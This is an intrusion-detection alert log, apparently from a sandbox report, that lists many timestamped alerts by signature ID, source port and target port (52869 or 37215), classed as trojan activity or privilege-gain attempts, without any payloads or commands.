                      Timestamp:07/20/24-23:05:52.460913
                      SID:2831300
                      Source Port:55850
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:01.996519
                      SID:2025132
                      Source Port:48192
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:36.343227
                      SID:2835222
                      Source Port:49816
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.454500
                      SID:2831300
                      Source Port:44784
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:45.429987
                      SID:2829579
                      Source Port:56148
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:06.458215
                      SID:2025132
                      Source Port:48224
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:03.015672
                      SID:2027339
                      Source Port:39396
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:38.548040
                      SID:2027339
                      Source Port:33074
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.389146
                      SID:2835222
                      Source Port:36724
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:42.257817
                      SID:2835222
                      Source Port:45434
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:35.589736
                      SID:2025132
                      Source Port:55764
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:58.383835
                      SID:2027339
                      Source Port:34632
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:12.244446
                      SID:2027339
                      Source Port:34330
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:18.534267
                      SID:2025132
                      Source Port:38254
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:37.464931
                      SID:2027339
                      Source Port:46142
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.499861
                      SID:2831300
                      Source Port:57474
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:35.245416
                      SID:2025132
                      Source Port:45142
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:01.997543
                      SID:2027339
                      Source Port:36028
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.493635
                      SID:2831300
                      Source Port:43720
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:14.126981
                      SID:2025132
                      Source Port:57506
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:37.445622
                      SID:2027339
                      Source Port:60962
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:09.587283
                      SID:2831300
                      Source Port:57698
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:25.528399
                      SID:2025132
                      Source Port:39370
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:45.205397
                      SID:2025132
                      Source Port:41782
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:29.518689
                      SID:2027339
                      Source Port:41002
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.620310
                      SID:2025132
                      Source Port:47114
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:52.442221
                      SID:2027339
                      Source Port:48414
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.631607
                      SID:2025132
                      Source Port:37614
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:01.831222
                      SID:2831300
                      Source Port:48730
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:11.420819
                      SID:2027339
                      Source Port:33128
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:02.606013
                      SID:2025132
                      Source Port:40144
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:06.595669
                      SID:2025132
                      Source Port:47900
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:18.694959
                      SID:2027339
                      Source Port:46330
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.823104
                      SID:2831300
                      Source Port:35624
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:05.313786
                      SID:2027339
                      Source Port:49104
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:33.829339
                      SID:2829579
                      Source Port:36214
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:48.795527
                      SID:2835222
                      Source Port:51250
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.192346
                      SID:2027339
                      Source Port:43294
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.524062
                      SID:2027339
                      Source Port:41992
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:54.322182
                      SID:2027339
                      Source Port:44418
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.047734
                      SID:2835222
                      Source Port:42434
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.962395
                      SID:2027339
                      Source Port:37872
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:07.862885
                      SID:2027339
                      Source Port:51598
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.648413
                      SID:2025132
                      Source Port:33050
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:56.056582
                      SID:2829579
                      Source Port:37080
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:13.663932
                      SID:2027339
                      Source Port:60416
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.658473
                      SID:2831300
                      Source Port:51422
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:33.829338
                      SID:2835222
                      Source Port:51272
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.591367
                      SID:2831300
                      Source Port:46050
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:08.320378
                      SID:2027339
                      Source Port:47732
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:08:34.140430
                      SID:2027339
                      Source Port:37366
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:47.347764
                      SID:2027339
                      Source Port:40786
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:48.020423
                      SID:2027339
                      Source Port:47882
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:50.528919
                      SID:2835222
                      Source Port:51216
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:14.554681
                      SID:2025132
                      Source Port:44714
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:56.120599
                      SID:2835222
                      Source Port:53616
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.361832
                      SID:2027339
                      Source Port:57610
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.524062
                      SID:2831300
                      Source Port:49236
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:29.032977
                      SID:2025132
                      Source Port:45532
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:01.878715
                      SID:2027339
                      Source Port:38314
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:17.581336
                      SID:2027339
                      Source Port:35868
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:16.291387
                      SID:2025132
                      Source Port:51238
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:51.585302
                      SID:2027339
                      Source Port:51104
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:07:16.958571
                      SID:2831300
                      Source Port:34588
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:36.037160
                      SID:2027339
                      Source Port:52304
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:47.404229
                      SID:2025132
                      Source Port:39340
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:42.221844
                      SID:2835222
                      Source Port:58780
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:03.269499
                      SID:2027339
                      Source Port:41968
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:48.780090
                      SID:2835222
                      Source Port:44772
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.003958
                      SID:2027339
                      Source Port:48904
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.417626
                      SID:2025132
                      Source Port:59632
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:31.522075
                      SID:2025132
                      Source Port:41466
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:33.852857
                      SID:2835222
                      Source Port:60312
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.325898
                      SID:2829579
                      Source Port:59354
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:22.925505
                      SID:2027339
                      Source Port:48402
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.892457
                      SID:2025132
                      Source Port:57146
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:39.754007
                      SID:2835222
                      Source Port:59086
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.367020
                      SID:2027339
                      Source Port:58364
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:38.953643
                      SID:2835222
                      Source Port:41826
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:50.571555
                      SID:2829579
                      Source Port:45152
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:55.858612
                      SID:2835222
                      Source Port:57376
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.502844
                      SID:2027339
                      Source Port:50060
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.124566
                      SID:2835222
                      Source Port:58894
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:02.175840
                      SID:2027339
                      Source Port:36732
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:02.938370
                      SID:2027339
                      Source Port:38776
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:07:27.998136
                      SID:2025132
                      Source Port:56590
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:52.443193
                      SID:2027339
                      Source Port:51246
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:34.662338
                      SID:2835222
                      Source Port:35268
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.636140
                      SID:2027339
                      Source Port:53482
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:47.086079
                      SID:2829579
                      Source Port:50520
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.430318
                      SID:2027339
                      Source Port:37864
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.139544
                      SID:2027339
                      Source Port:58666
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.068836
                      SID:2025132
                      Source Port:36874
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:52.537891
                      SID:2831300
                      Source Port:59170
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:58.549030
                      SID:2027339
                      Source Port:44836
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:23.035057
                      SID:2027339
                      Source Port:58616
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.035942
                      SID:2835222
                      Source Port:56914
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.132087
                      SID:2027339
                      Source Port:53904
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:09.675612
                      SID:2027339
                      Source Port:50026
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:42.245949
                      SID:2829579
                      Source Port:48846
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.582882
                      SID:2027339
                      Source Port:47092
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.727506
                      SID:2025132
                      Source Port:52272
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:31.826739
                      SID:2025132
                      Source Port:56180
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:11.221707
                      SID:2831300
                      Source Port:59748
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:11.280683
                      SID:2025132
                      Source Port:54286
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:59.273796
                      SID:2025132
                      Source Port:55738
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:42.180899
                      SID:2829579
                      Source Port:42762
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:35.755759
                      SID:2027339
                      Source Port:54828
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:48.762153
                      SID:2829579
                      Source Port:57568
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:48.801547
                      SID:2829579
                      Source Port:49980
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.192858
                      SID:2831300
                      Source Port:60954
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:37.442841
                      SID:2831300
                      Source Port:57824
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:40.377377
                      SID:2831300
                      Source Port:37808
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:08.587454
                      SID:2027339
                      Source Port:59998
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.028871
                      SID:2025132
                      Source Port:59476
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:38.701210
                      SID:2027339
                      Source Port:45650
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.453622
                      SID:2831300
                      Source Port:36296
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:36.361899
                      SID:2027339
                      Source Port:39372
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.727364
                      SID:2027339
                      Source Port:56484
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.383849
                      SID:2829579
                      Source Port:36642
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.315621
                      SID:2831300
                      Source Port:37722
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:01.695131
                      SID:2027339
                      Source Port:32900
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.349447
                      SID:2025132
                      Source Port:49874
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:40.486123
                      SID:2027339
                      Source Port:46350
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.880010
                      SID:2025132
                      Source Port:46180
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:56.771185
                      SID:2025132
                      Source Port:51974
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:56.395498
                      SID:2025132
                      Source Port:37946
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:58.758912
                      SID:2027339
                      Source Port:55328
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:40.959334
                      SID:2025132
                      Source Port:45534
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:56.249595
                      SID:2829579
                      Source Port:41342
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:05.520793
                      SID:2831300
                      Source Port:56368
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:37.476168
                      SID:2027339
                      Source Port:55692
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:14.957724
                      SID:2027339
                      Source Port:48996
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:47.556659
                      SID:2027339
                      Source Port:55336
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:02.182231
                      SID:2831300
                      Source Port:44202
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:13.525153
                      SID:2831300
                      Source Port:53548
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:42.134564
                      SID:2829579
                      Source Port:35384
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.066947
                      SID:2835222
                      Source Port:57386
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.531088
                      SID:2831300
                      Source Port:60598
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:57.062143
                      SID:2831300
                      Source Port:38766
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:07:28.154823
                      SID:2027339
                      Source Port:48582
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.121675
                      SID:2831300
                      Source Port:54752
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:16.974761
                      SID:2027339
                      Source Port:42390
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:33.857158
                      SID:2835222
                      Source Port:38446
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:24.584748
                      SID:2027339
                      Source Port:56734
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.334876
                      SID:2831300
                      Source Port:33406
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:58.195412
                      SID:2025132
                      Source Port:38580
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:50.600216
                      SID:2829579
                      Source Port:47282
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.247483
                      SID:2027339
                      Source Port:50706
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.127021
                      SID:2027339
                      Source Port:38770
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:48.767395
                      SID:2835222
                      Source Port:55980
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:55.981552
                      SID:2027339
                      Source Port:33480
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:00.018611
                      SID:2027339
                      Source Port:32964
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:27.747099
                      SID:2027339
                      Source Port:49420
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:38.250934
                      SID:2027339
                      Source Port:37214
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:00.954677
                      SID:2025132
                      Source Port:36180
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:57.123864
                      SID:2831300
                      Source Port:43086
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:57.791970
                      SID:2027339
                      Source Port:35084
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.598734
                      SID:2829579
                      Source Port:39928
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:38.949221
                      SID:2835222
                      Source Port:53174
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.486123
                      SID:2027339
                      Source Port:53186
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.709518
                      SID:2025132
                      Source Port:55540
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:45.614327
                      SID:2027339
                      Source Port:38970
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:00.055828
                      SID:2025132
                      Source Port:60794
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:00.055828
                      SID:2027339
                      Source Port:48716
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.823104
                      SID:2027339
                      Source Port:32864
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:34.648426
                      SID:2835222
                      Source Port:43456
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.524280
                      SID:2831300
                      Source Port:53766
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:38.653067
                      SID:2025132
                      Source Port:52802
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:52.546680
                      SID:2831300
                      Source Port:34094
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:52.551649
                      SID:2027339
                      Source Port:43366
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:00.844262
                      SID:2027339
                      Source Port:33224
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:33.859349
                      SID:2829579
                      Source Port:41858
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.449873
                      SID:2027339
                      Source Port:48264
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.029235
                      SID:2831300
                      Source Port:38866
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:03.387430
                      SID:2835222
                      Source Port:57628
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.444444
                      SID:2027339
                      Source Port:37442
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:03.429850
                      SID:2025132
                      Source Port:52880
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:52.493434
                      SID:2831300
                      Source Port:45034
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:09.485916
                      SID:2831300
                      Source Port:38944
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
